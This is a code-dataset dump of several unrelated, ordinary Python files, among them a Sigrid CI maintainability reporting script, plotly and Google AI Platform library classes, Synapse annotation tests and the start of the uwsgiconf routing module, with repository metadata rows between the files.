"COMPONENT_BALANCE_PROP", "COMPONENT_INDEPENDENCE", "COMPONENT_ENTANGLEMENT", "MAINTAINABILITY"]
REFACTORING_CANDIDATE_METRICS = ["DUPLICATION", "UNIT_SIZE", "UNIT_COMPLEXITY", "UNIT_INTERFACING",
"MODULE_COUPLING"]
def generate(self, feedback, args, target):
pass
def formatRating(self, ratings, metric, naText="N/A"):
if ratings.get(metric, None) == None:
return naText
return "%.1f" % ratings[metric]
def formatBaseline(self, feedback):
if not feedback.get("baseline", None):
return "N/A"
snapshotDate = datetime.datetime.strptime(feedback["baseline"], "%Y%m%d")
return snapshotDate.strftime("%Y-%m-%d")
def getSigridUrl(self, args):
return "https://sigrid-says.com/" + urllib.parse.quote_plus(args.customer) + "/" + \
urllib.parse.quote_plus(args.system);
def getRefactoringCandidates(self, feedback, metric):
refactoringCandidates = feedback.get("refactoringCandidates", [])
return [rc for rc in refactoringCandidates if rc["metric"] == metric]
class TextReport(Report):
ANSI_BOLD = "\033[1m"
ANSI_GREEN = "\033[92m"
ANSI_YELLOW = "\033[33m"
ANSI_RED = "\033[91m"
ANSI_BLUE = "\033[96m"
LINE_WIDTH = 91
def generate(self, feedback, args, target):
self.printHeader("Refactoring candidates")
for metric in self.REFACTORING_CANDIDATE_METRICS:
self.printMetric(feedback, metric)
self.printHeader("Maintainability ratings")
print("System property".ljust(40) + f"Baseline ({self.formatBaseline(feedback)}) New/changed code Target")
for metric in self.METRICS:
if metric == "MAINTAINABILITY":
print("-" * self.LINE_WIDTH)
fields = (metric.replace("_PROP", "").title().replace("_", " "), \
"(" + self.formatRating(feedback["overallRatings"], metric) + ")", \
self.formatRating(feedback["newCodeRatings"], metric), \
str(target.ratings.get(metric, "")))
self.printColor("%-40s%-25s%-20s%s" % fields, self.getRatingColor(feedback, target, metric))
def printHeader(self, header):
print("")
print("-" * self.LINE_WIDTH)
print(header)
print("-" * self.LINE_WIDTH)
def printMetric(self, feedback, metric):
print("")
print(metric.replace("_PROP", "").title().replace("_", " "))
refactoringCandidates = self.getRefactoringCandidates(feedback, metric)
if len(refactoringCandidates) == 0:
print(" None")
else:
for rc in refactoringCandidates:
print(self.formatRefactoringCandidate(rc))
def getRatingColor(self, feedback, target, metric):
if feedback["newCodeRatings"].get(metric, None) == None or not metric in target.ratings:
return self.ANSI_BLUE
elif target.meetsTargetQualityForMetric(feedback, metric):
return self.ANSI_GREEN
else:
return self.ANSI_RED
def formatRefactoringCandidate(self, rc):
category = ("(" + rc["category"] + ")").ljust(14)
subject = rc["subject"].replace("\n", "\n" + (" " * 21)).replace("::", "\n" + (" " * 21))
return f" - {category} {subject}"
def printColor(self, message, ansiPrefix):
print(ansiPrefix + message + "\033[0m")
class StaticHtmlReport(Report):
HTML_STAR_FULL = "★"
HTML_STAR_EMPTY = "☆"
def generate(self, feedback, args, target):
if not os.path.exists("sigrid-ci-output"):
os.mkdir("sigrid-ci-output")
with open(os.path.dirname(__file__) + "/sigridci-feedback-template.html", encoding="utf-8", mode="r") as templateRef:
template = templateRef.read()
template = self.renderHtmlFeedback(template, feedback, args, target)
reportFile = os.path.abspath("sigrid-ci-output/index.html")
writer = open(reportFile, encoding="utf-8", mode="w")
writer.write(template)
writer.close()
print("")
print("You can find the full results here:")
print(" " + reportFile)
print("")
print("You can find more information about these results in Sigrid:")
print(" " + self.getSigridUrl(args))
print("")
def renderHtmlFeedback(self, template, feedback, args, target):
placeholders = {
"CUSTOMER" : html.escape(args.customer),
"SYSTEM" : html.escape(args.system),
"TARGET" : "%.1f" % target.ratings["MAINTAINABILITY"],
"LINES_OF_CODE_TOUCHED" : "%d" % feedback.get("newCodeLinesOfCode", 0),
"BASELINE_DATE" : self.formatBaseline(feedback),
"SIGRID_LINK" : self.getSigridUrl(args),
"MAINTAINABILITY_PASSED" : ("passed" if target.meetsOverallQualityTarget(feedback) else "failed")
}
for metric in self.METRICS:
placeholders[f"{metric}_OVERALL"] = self.formatRating(feedback["overallRatings"], metric)
placeholders[f"{metric}_NEW"] = self.formatRating(feedback["newCodeRatings"], metric)
placeholders[f"{metric}_TARGET"] = self.formatRating(target.ratings, metric, "")
placeholders[f"{metric}_STARS_OVERALL"] = self.formatHtmlStars(feedback["overallRatings"], metric)
placeholders[f"{metric}_STARS_NEW"] = self.formatHtmlStars(feedback["newCodeRatings"], metric)
placeholders[f"{metric}_PASSED"] = self.formatPassed(feedback, target, metric)
placeholders[f"{metric}_REFACTORING_CANDIDATES"] = self.formatRefactoringCandidates(feedback, metric)
return self.fillPlaceholders(template, placeholders)
def fillPlaceholders(self, template, placeholders):
for placeholder, value in placeholders.items():
template = template.replace(f"@@@{placeholder}", value)
return template
def formatPassed(self, feedback, target, metric):
if target.ratings.get(metric, None) == None:
return ""
return "passed" if target.meetsTargetQualityForMetric(feedback, metric) else "failed"
def formatRefactoringCandidates(self, feedback, metric):
refactoringCandidates = self.getRefactoringCandidates(feedback, metric)
if len(refactoringCandidates) == 0:
return "None"
return "\n".join([self.formatRefactoringCandidate(rc) for rc in refactoringCandidates])
def formatRefactoringCandidate(self, rc):
subjectName = html.escape(rc["subject"]).replace("\n", "<br />").replace("::", "<br />")
category = html.escape(rc["category"])
return f"<span><em>({category})</em><div>{subjectName}</div></span>"
def formatHtmlStars(self, ratings, metric):
if ratings.get(metric, None) == None:
return "N/A"
stars = min(int(ratings[metric] + 0.5), 5)
fullStars = stars * self.HTML_STAR_FULL
emptyStars = (5 - stars) * self.HTML_STAR_EMPTY
rating = self.formatRating(ratings, metric)
return f"<strong class=\"stars{stars}\">{fullStars}{emptyStars}</strong> " + rating
class ExitCodeReport(Report):
def generate(self, feedback, args, target):
asciiArt = TextReport()
if target.meetsOverallQualityTarget(feedback):
asciiArt.printColor("\n** SIGRID CI RUN COMPLETE: YOU WROTE MAINTAINABLE CODE AND REACHED THE TARGET **\n", \
asciiArt.ANSI_BOLD + asciiArt.ANSI_GREEN)
else:
asciiArt.printColor("\n** SIGRID CI RUN COMPLETE: THE CODE YOU WROTE DID NOT MEET THE TARGET FOR MAINTAINABLE CODE **\n", \
asciiArt.ANSI_BOLD + asciiArt.ANSI_YELLOW)
# If you publish(only) we never break the build
# We can break the build when running on a branch or pull request.
if not args.publish:
sys.exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--partner", type=str, default="sig")
parser.add_argument("--customer", type=str)
parser.add_argument("--system", type=str)
parser.add_argument("--source", type=str)
parser.add_argument("--targetquality", type=float, default=3.5)
parser.add_argument("--publish", action="store_true")
parser.add_argument("--publishonly", action="store_true")
parser.add_argument("--exclude", type=str, default="")
parser.add_argument("--pathprefix", type=str, default="")
parser.add_argument("--showupload", action="store_true")
parser.add_argument("--history", action="store_true")
parser.add_argument("--sigridurl", type=str, default="https://sigrid-says.com")
args = parser.parse_args()
if args.customer == None or args.system == None or args.source == None:
parser.print_help()
sys.exit(1)
if sys.version_info.major == 2 or sys.version_info.minor < 7:
print("Sigrid CI requires Python 3.7 or higher")
sys.exit(1)
if not "SIGRID_CI_ACCOUNT" in os.environ or not "SIGRID_CI_TOKEN" in os.environ:
print("Sigrid account not found in environment variables SIGRID_CI_ACCOUNT and SIGRID_CI_TOKEN")
sys.exit(1)
if not os.path.exists(args.source):
print("Source code directory not found: " + args.source)
sys.exit(1)
if args.publish and len(args.pathprefix) > 0:
print("You cannot use both --publish and --pathprefix at the same time, refer to the documentation for details")
sys.exit(1)
log("Starting Sigrid CI")
options = UploadOptions(args.source, args.exclude.split(","), args.history, args.pathprefix, args.showupload)
target = TargetQuality(f"{args.source}/sigrid.yaml", args.targetquality)
apiClient = SigridApiClient(args)
analysisId = apiClient.submitUpload(options)
if args.publishonly:
log("Your project's source code has been published to Sigrid")
else:
feedback = apiClient.fetchAnalysisResults(analysisId)
for report in [TextReport(), StaticHtmlReport(), ExitCodeReport()]:
report.generate(feedback, args, target)
| 41.682474 | 135 | 0.616838 |
e15cb473b9e86f402c7cc6e07595cd1b2e600dc4 | 237 | py | Python | example/example.py | getveryrichet/example_pip_package | b72b66014ac72bb24b6e31679632e51321ecb96c | [
"MIT"
] | null | null | null | example/example.py | getveryrichet/example_pip_package | b72b66014ac72bb24b6e31679632e51321ecb96c | [
"MIT"
] | null | null | null | example/example.py | getveryrichet/example_pip_package | b72b66014ac72bb24b6e31679632e51321ecb96c | [
"MIT"
] | null | null | null | import numpy as np
# after from example import example
# allows using example.child_example.child_example()
from .child import child_example
def hello_requests():
print(np)
def check_time():
child_example.child_example_time() | 23.7 | 53 | 0.776371 |
014e682ff638c2da45728fa7575ef829c6887e07 | 7,024 | py | Python | env/Lib/site-packages/plotly/graph_objs/cone/colorbar/_title.py | andresgreen-byte/Laboratorio-1--Inversion-de-Capital | 8a4707301d19c3826c31026c4077930bcd6a8182 | [
"MIT"
] | 7 | 2022-01-16T12:28:16.000Z | 2022-03-04T15:31:45.000Z | env/Lib/site-packages/plotly/graph_objs/cone/colorbar/_title.py | andresgreen-byte/Laboratorio-1--Inversion-de-Capital | 8a4707301d19c3826c31026c4077930bcd6a8182 | [
"MIT"
] | 14 | 2021-10-20T23:33:47.000Z | 2021-12-21T04:50:37.000Z | env/Lib/site-packages/plotly/graph_objs/cone/colorbar/_title.py | andresgreen-byte/Laboratorio-1--Inversion-de-Capital | 8a4707301d19c3826c31026c4077930bcd6a8182 | [
"MIT"
] | null | null | null | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Title(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "cone.colorbar"
_path_str = "cone.colorbar.title"
_valid_props = {"font", "side", "text"}
# font
# ----
@property
def font(self):
"""
Sets this color bar's title font. Note that the title's font
used to be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of :class:`plotly.graph_objs.cone.colorbar.title.Font`
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.cone.colorbar.title.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# side
# ----
@property
def side(self):
"""
Determines the location of color bar's title with respect to
the color bar. Defaults to "top" when `orientation` if "v" and
defaults to "right" when `orientation` if "h". Note that the
title's location used to be set by the now deprecated
`titleside` attribute.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['right', 'top', 'bottom']
Returns
-------
Any
"""
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# text
# ----
@property
def text(self):
"""
Sets the title of the color bar. Note that before the existence
of `title.text`, the title's contents used to be defined as the
`title` attribute itself. This behavior has been deprecated.
The 'text' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["text"]
@text.setter
def text(self, val):
self["text"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Defaults to "top" when
`orientation` if "v" and defaults to "right" when
`orientation` if "h". Note that the title's location
used to be set by the now deprecated `titleside`
attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
"""
def __init__(self, arg=None, font=None, side=None, text=None, **kwargs):
"""
Construct a new Title object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.cone.colorbar.Title`
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Defaults to "top" when
`orientation` if "v" and defaults to "right" when
`orientation` if "h". Note that the title's location
used to be set by the now deprecated `titleside`
attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
Returns
-------
Title
"""
super(Title, self).__init__("title")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.cone.colorbar.Title
constructor must be a dict or
an instance of :class:`plotly.graph_objs.cone.colorbar.Title`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("font", None)
_v = font if font is not None else _v
if _v is not None:
self["font"] = _v
_v = arg.pop("side", None)
_v = side if side is not None else _v
if _v is not None:
self["side"] = _v
_v = arg.pop("text", None)
_v = text if text is not None else _v
if _v is not None:
self["text"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| 33.2891 | 82 | 0.537443 |
3c526dd62e729b61dfcc912790b4f3616dd2887c | 1,116 | py | Python | google/cloud/aiplatform_v1/types/job_state.py | sakagarwal/python-aiplatform | 62b4a1ea589235910c6e87f027899a29bf1bacb1 | [
"Apache-2.0"
] | 1 | 2022-03-30T05:23:29.000Z | 2022-03-30T05:23:29.000Z | google/cloud/aiplatform_v1/types/job_state.py | sakagarwal/python-aiplatform | 62b4a1ea589235910c6e87f027899a29bf1bacb1 | [
"Apache-2.0"
] | null | null | null | google/cloud/aiplatform_v1/types/job_state.py | sakagarwal/python-aiplatform | 62b4a1ea589235910c6e87f027899a29bf1bacb1 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.aiplatform.v1", manifest={"JobState",},
)
class JobState(proto.Enum):
r"""Describes the state of a job."""
JOB_STATE_UNSPECIFIED = 0
JOB_STATE_QUEUED = 1
JOB_STATE_PENDING = 2
JOB_STATE_RUNNING = 3
JOB_STATE_SUCCEEDED = 4
JOB_STATE_FAILED = 5
JOB_STATE_CANCELLING = 6
JOB_STATE_CANCELLED = 7
JOB_STATE_PAUSED = 8
JOB_STATE_EXPIRED = 9
__all__ = tuple(sorted(__protobuf__.manifest))
| 28.615385 | 74 | 0.725806 |
d232b04b709b7a1c7c04ca69739584fcb89073ae | 6,497 | py | Python | tests/unit/unit_test_annotations.py | Burrch3s/synapsePythonClient | 2d1bcca576d43118c78b2e81db69ac6e5bfbf8f5 | [
"Apache-2.0"
] | null | null | null | tests/unit/unit_test_annotations.py | Burrch3s/synapsePythonClient | 2d1bcca576d43118c78b2e81db69ac6e5bfbf8f5 | [
"Apache-2.0"
] | null | null | null | tests/unit/unit_test_annotations.py | Burrch3s/synapsePythonClient | 2d1bcca576d43118c78b2e81db69ac6e5bfbf8f5 | [
"Apache-2.0"
] | null | null | null | # unit tests for python synapse client
############################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import OrderedDict
from datetime import datetime as Datetime
from nose.tools import assert_raises, assert_equals, assert_false, assert_true, assert_greater, assert_is_instance
from math import pi
from synapseclient.annotations import to_synapse_annotations, from_synapse_annotations,\
to_submission_status_annotations, from_submission_status_annotations, set_privacy
from synapseclient.exceptions import *
def test_annotations():
"""Test string annotations"""
a = dict(foo='bar', zoo=['zing', 'zaboo'], species='Platypus')
sa = to_synapse_annotations(a)
assert_equals(sa['stringAnnotations']['foo'], ['bar'])
assert_equals(sa['stringAnnotations']['zoo'], ['zing', 'zaboo'])
assert_equals(sa['stringAnnotations']['species'], ['Platypus'])
def test_annotation_name_collision():
"""Test handling of a name collisions between typed user generated and untyped
system generated annotations, see SYNPY-203 and PLFM-3248"""
# order is important: to repro the erro, the key uri has to come before stringAnnotations
sa = OrderedDict()
sa[u'uri'] = u'/entity/syn47396/annotations'
sa[u'doubleAnnotations'] = {}
sa[u'longAnnotations'] = {}
sa[u'stringAnnotations'] = {
'tissueType': ['Blood'],
'uri': ['/repo/v1/dataset/47396']}
sa[u'creationDate'] = u'1321168909232'
sa[u'id'] = u'syn47396'
a = from_synapse_annotations(sa)
assert_equals(a['tissueType'], ['Blood'])
def test_more_annotations():
"""Test long, float and data annotations"""
a = dict(foo=1234,
zoo=[123.1, 456.2, 789.3],
species='Platypus',
birthdays=[Datetime(1969, 4, 28), Datetime(1973, 12, 8), Datetime(2008, 1, 3)],
test_boolean=True,
test_mo_booleans=[False, True, True, False])
sa = to_synapse_annotations(a)
assert_equals(sa['longAnnotations']['foo'], [1234])
assert_equals(sa['doubleAnnotations']['zoo'], [123.1, 456.2, 789.3])
assert_equals(sa['stringAnnotations']['species'], ['Platypus'])
assert_equals(sa['stringAnnotations']['test_boolean'], ['true'])
assert_equals(sa['stringAnnotations']['test_mo_booleans'], ['false', 'true', 'true', 'false'])
# this part of the test is kinda fragile. It it breaks again, it should be removed
bdays = [utils.from_unix_epoch_time(t) for t in sa['dateAnnotations']['birthdays']]
assert_true(all([t in bdays for t in [Datetime(1969, 4, 28), Datetime(1973, 12, 8), Datetime(2008, 1, 3)]]))
def test_annotations_unicode():
a = {'files': [u'tmp6y5tVr.txt'], 'cacheDir': u'/Users/chris/.synapseCache/python/syn1809087', u'foo': 1266}
sa = to_synapse_annotations(a)
assert_equals(sa['stringAnnotations']['cacheDir'], [u'/Users/chris/.synapseCache/python/syn1809087'])
def test_round_trip_annotations():
"""Test that annotations can make the round trip from a simple dictionary to the synapse format and back"""
a = dict(foo=1234, zoo=[123.1, 456.2, 789.3], species='Moose',
birthdays=[Datetime(1969, 4, 28), Datetime(1973, 12, 8), Datetime(2008, 1, 3), Datetime(2013, 3, 15)])
sa = to_synapse_annotations(a)
a2 = from_synapse_annotations(sa)
a = a2
def test_mixed_annotations():
"""test that to_synapse_annotations will coerce a list of mixed types to strings"""
a = dict(foo=[1, 'a', Datetime(1969, 4, 28, 11, 47)])
sa = to_synapse_annotations(a)
a2 = from_synapse_annotations(sa)
assert_equals(a2['foo'][0], '1')
assert_equals(a2['foo'][1], 'a')
assert_greater(a2['foo'][2].find('1969'), -1)
def test_idempotent_annotations():
"""test that to_synapse_annotations won't mess up a dictionary that's already in the synapse format"""
a = dict(species='Moose', n=42, birthday=Datetime(1969, 4, 28))
sa = to_synapse_annotations(a)
a2 = dict()
a2.update(sa)
sa2 = to_synapse_annotations(a2)
assert_equals(sa, sa2)
def test_submission_status_annotations_round_trip():
april_28_1969 = Datetime(1969, 4, 28)
a = dict(screen_name='Bullwinkle', species='Moose', lucky=13, pi=pi, birthday=april_28_1969)
sa = to_submission_status_annotations(a)
assert_equals({'screen_name', 'species'}, set([kvp['key'] for kvp in sa['stringAnnos']]))
assert_equals({'Bullwinkle', 'Moose'}, set([kvp['value'] for kvp in sa['stringAnnos']]))
# test idempotence
assert_equals(sa, to_submission_status_annotations(sa))
assert_equals({'lucky', 'birthday'}, set([kvp['key'] for kvp in sa['longAnnos']]))
for kvp in sa['longAnnos']:
key = kvp['key']
value = kvp['value']
if key == 'lucky':
assert_equals(value, 13)
if key == 'birthday':
assert_equals(utils.from_unix_epoch_time(value), april_28_1969)
assert_equals({'pi'}, set([kvp['key'] for kvp in sa['doubleAnnos']]))
assert_equals({pi}, set([kvp['value'] for kvp in sa['doubleAnnos']]))
set_privacy(sa, key='screen_name', is_private=False)
assert_raises(KeyError, set_privacy, sa, key='this_key_does_not_exist', is_private=False)
for kvp in sa['stringAnnos']:
if kvp['key'] == 'screen_name':
assert_false(kvp['isPrivate'])
a2 = from_submission_status_annotations(sa)
# TODO: is there a way to convert dates back from longs automatically?
a2['birthday'] = utils.from_unix_epoch_time(a2['birthday'])
assert_equals(a, a2)
# test idempotence
assert_equals(a, from_submission_status_annotations(a))
def test_submission_status_double_annos():
ssa = {'longAnnos': [{'isPrivate': False, 'value': 13, 'key': 'lucky'}],
'doubleAnnos': [{'isPrivate': False, 'value': 3, 'key': 'three'},
{'isPrivate': False, 'value': pi, 'key': 'pi'}]}
# test that the double annotation 'three':3 is interpreted as a floating
# point 3.0 rather than an integer 3
annotations = from_submission_status_annotations(ssa)
assert_is_instance(annotations['three'], float)
ssa2 = to_submission_status_annotations(annotations)
assert_equals({'three', 'pi'}, set([kvp['key'] for kvp in ssa2['doubleAnnos']]))
assert_equals({'lucky'}, set([kvp['key'] for kvp in ssa2['longAnnos']]))
| 43.313333 | 115 | 0.672464 |
945199c8b87a369bc40d7ffd58413ad1ecd42e24 | 1,657 | py | Python | pandna/base_bio_data_frame.py | dceoy/pandaseq | 2679bc232497e285ba8a09c394863eb6affc580a | [
"MIT"
] | null | null | null | pandna/base_bio_data_frame.py | dceoy/pandaseq | 2679bc232497e285ba8a09c394863eb6affc580a | [
"MIT"
] | null | null | null | pandna/base_bio_data_frame.py | dceoy/pandaseq | 2679bc232497e285ba8a09c394863eb6affc580a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# Pandas-based Data Frame Handlers DNA-sequencing
# https://github.com/dceoy/pandna
from abc import ABCMeta, abstractmethod
import os
import subprocess
import pandas as pd
class BaseBioDataFrame(object, metaclass=ABCMeta):
def __init__(self, path, supported_exts=[]):
if os.path.isfile(path):
self.path = path
else:
raise BioDataFrameError('file not found: {}'.format(path))
hit_exts = [x for x in supported_exts if path.endswith(x)]
if supported_exts and not hit_exts:
raise BioDataFrameError('invalid file extension: {}'.format(path))
self.df = pd.DataFrame()
@abstractmethod
def load(self):
pass
def load_and_output_df(self):
self.load()
return self.df
def write_df(self, path, mode='w', **kwargs):
if self.header:
with open(path, mode=mode) as f:
for h in self.header:
f.write(h + os.linesep)
self.df.to_csv(path, mode=('a' if self.header else 'w'), **kwargs)
@staticmethod
def run_and_parse_subprocess(args, stdout=subprocess.PIPE, **kwargs):
with subprocess.Popen(args=args, stdout=stdout, **kwargs) as p:
for line in p.stdout:
yield line.decode('utf-8')
outs, errs = p.communicate()
if p.returncode == 0:
pass
else:
raise subprocess.CalledProcessError(
returncode=p.returncode, cmd=p.args, output=outs,
stderr=errs
)
class BioDataFrameError(RuntimeError):
pass
| 30.127273 | 78 | 0.592034 |
8abfff184db95a5821dff4ad5ed2969625a304f4 | 13,329 | py | Python | uwsgiconf/options/routing.py | graceshaw/uwsgiconf | 205289bb279dfbcc1d9bfd599dd8ca5d6c527077 | [
"BSD-3-Clause"
] | null | null | null | uwsgiconf/options/routing.py | graceshaw/uwsgiconf | 205289bb279dfbcc1d9bfd599dd8ca5d6c527077 | [
"BSD-3-Clause"
] | null | null | null | uwsgiconf/options/routing.py | graceshaw/uwsgiconf | 205289bb279dfbcc1d9bfd599dd8ca5d6c527077 | [
"BSD-3-Clause"
] | null | null | null | import os
from .routing_actions import *
from .routing_modifiers import *
from .routing_routers import *
from .routing_subjects import *
from .routing_vars import *
from ..base import OptionsGroup
from ..exceptions import ConfigurationError
from ..utils import listify
class RouteRule:
"""Represents a routing rule."""
class vars:
"""Routing variables."""
cookie = VarCookie
geoip = VarGeoip
httptime = VarHttptime
metric = VarMetric
query = VarQuery
request = VarRequest
time = VarTime
uwsgi = VarUwsgi
class var_functions:
"""Functions that can be applied to variables."""
base64 = FuncBase64
hex = FuncHex
lower = FuncLower
math = FuncMath
mime = FuncMime
upper = FuncUpper
class stages:
"""During the request cycle, various stages (aka chains) are processed.
Chains can be "recursive". A recursive chain can be called multiple times
in a request cycle.
"""
REQUEST = ''
"""Applied before the request is passed to the plugin."""
ERROR = 'error'
"""Applied as soon as an HTTP status code is generate. **Recursive chain**."""
RESPONSE = 'response'
"""Applied after the last response header has been generated (just before sending the body)."""
FINAL = 'final'
"""Applied after the response has been sent to the client."""
class subjects:
"""Routing subjects. These can be request's variables or other entities.
.. note:: Non-custom subjects can be pre-optimized (during startup)
and should be used for performance reasons.
"""
custom = SubjectCustom
http_host = SubjectHttpHost
http_referer = SubjectHttpReferer
http_user_agent = SubjectHttpUserAgent
path_info = SubjectPathInfo
query_string = SubjectQueryString
remote_addr = SubjectRemoteAddr
remote_user = SubjectRemoteUser
request_uri = SubjectRequestUri
status = SubjectStatus
class transforms:
"""A transformation is like a filter applied to the response
generated by your application.
Transformations can be chained (the output of a transformation will be the input of the following one)
and can completely overwrite response headers.
* http://uwsgi.readthedocs.io/en/latest/Transformations.html
"""
chunked = ActionChunked
fix_content_len = ActionFixContentLen
flush = ActionFlush
gzip = ActionGzip
template = ActionTemplate
to_file = ActionToFile
upper = ActionUpper
# todo Consider adding the following and some others from sources (incl. plugins):
# xslt, cachestore, memcachedstore, redisstore, rpc, lua
class actions:
"""Actions available for routing rules.
Values returned by actions:
* ``NEXT`` - continue to the next rule
* ``CONTINUE`` - stop scanning the internal routing table and run the request
* ``BREAK`` - stop scanning the internal routing table and close the request
* ``GOTO x`` - go to rule ``x``
"""
add_var_cgi = ActionAddVarCgi
add_var_log = ActionAddVarLog
alarm = ActionAlarm
auth_basic = ActionAuthBasic
auth_ldap = AuthLdap
dir_change = ActionDirChange
do_break = ActionDoBreak
do_continue = ActionDoContinue
do_goto = ActionDoGoto
fix_var_path_info = ActionFixVarPathInfo
header_add = ActionHeaderAdd
header_remove = ActionHeaderRemove
headers_off = ActionHeadersOff
headers_reset = ActionHeadersReset
log = ActionLog
offload_off = ActionOffloadOff
redirect = ActionRedirect
rewrite = ActionRewrite
route_external = ActionRouteExternal
route_uwsgi = ActionRouteUwsgi
send = ActionSend
serve_static = ActionServeStatic
set_harakiri = ActionSetHarakiri
set_script_file = ActionSetScriptFile
set_uwsgi_process_name = ActionSetUwsgiProcessName
set_var_document_root = ActionSetVarDocumentRoot
set_var_path_info = ActionSetVarPathInfo
set_var_remote_addr = ActionSetVarRemoteAddr
set_var_remote_user = ActionSetVarRemoteUser
set_var_request_method = ActionSetVarRequestMethod
set_var_request_uri = ActionSetVarRequestUri
set_var_script_name = ActionSetVarScriptName
set_var_uwsgi_appid = ActionSetVarUwsgiAppid
set_var_uwsgi_home = ActionSetVarUwsgiHome
set_var_uwsgi_scheme = ActionSetVarUwsgiScheme
signal = ActionSignal
# todo Consider adding the following and some others from sources (incl. plugins):
# cachestore, cacheset, memcached,
# router_cache: cache, cache-continue, cachevar, cacheinc, cachedec, cachemul, cachediv
# rpc,
# rpc: call, rpcret, rpcnext, rpcraw, rpcvar,
# access, spnego, radius
# xslt, ssi, gridfs
# cgi: cgi, cgihelper
# router_access: access,
# proxyhttp -router_http, proxyuwsgi -router_uwsgi, xattr -xattr
# router_memcached: memcached, memcached-continue, memcachedstore
# router_redis: redis, redis-continue, redisstore
def __init__(self, action, subject=None, stage=stages.REQUEST):
"""
:param RouteAction action: Action (or transformation) to perfrom.
See ``.actions`` and ``.transforms``.
:param SubjectCustom|SubjectBuiltin|str subject: Subject to verify before action is performed.
See ``.subjects``.
* String values are automatically transformed into ``subjects.path_info``.
* If ``None`` action is performed always w/o subject check.
:param str stage: Stage on which the action needs to be performed.
See ``.stages``.
"""
if subject is None:
subject = 'run' # always run the specified route action
elif isinstance(subject, str):
subject = self.subjects.path_info(subject)
subject_rule = ''
self._custom_subject = isinstance(subject, SubjectCustom)
if self._custom_subject:
subject_rule = subject
subject = 'if-not' if subject.negate else 'if'
elif isinstance(subject, SubjectBuiltin):
subject_rule = subject.regexp
subject = subject.name
self.command_label = f'{stage}-route-label'.strip('-')
self.command = f'{stage}-route-{subject}'.strip('-')
self.value = subject_rule, action
class Routing(OptionsGroup):
"""Routing subsystem.
You can use the internal routing subsystem to dynamically alter the way requests are handled.
.. note:: Since 1.9
* http://uwsgi.readthedocs.io/en/latest/InternalRouting.html
* http://uwsgi.readthedocs.io/en/latest/Transformations.html
"""
route_rule = RouteRule
class routers:
"""Dedicated routers, which can be used with `register_router()`."""
http = RouterHttp
https = RouterHttps
ssl = RouterSsl
fast = RouterFast
raw = RouterRaw
forkpty = RouterForkPty
tuntap = RouterTunTap
class modifiers:
"""Routing modifiers.
* http://uwsgi.readthedocs.io/en/latest/Protocol.html
"""
cache = ModifierCache
cgi = ModifierCgi
cluster_node = ModifierClusterNode
config_from_node = ModifierConfigFromNode
corerouter_signal = ModifierCorerouterSignal
echo = ModifierEcho
eval = ModifierEval
example = ModifierExample
fastfunc = ModifierFastfunc
gccgo = ModifierGccgo
glusterfs = ModifierGlusterfs
gridfs = ModifierGridfs
jvm = ModifierJvm
legion_msg = ModifierLegionMsg
lua = ModifierLua
manage = ModifierManage
manage_path_info = ModifierManagePathInfo
message = ModifierMessage
message_array = ModifierMessageArray
message_marshal = ModifierMessageMarshal
mono = ModifierMono
multicast = ModifierMulticast
multicast_announce = ModifierMulticastAnnounce
persistent_close = ModifierPersistentClose
php = ModifierPhp
ping = ModifierPing
psgi = ModifierPsgi
rack = ModifierRack
rados = ModifierRados
raw = ModifierRaw
reload = ModifierReload
reload_brutal = ModifierReloadBrutal
remote_logging = ModifierRemoteLogging
response = ModifierResponse
rpc = ModifierRpc
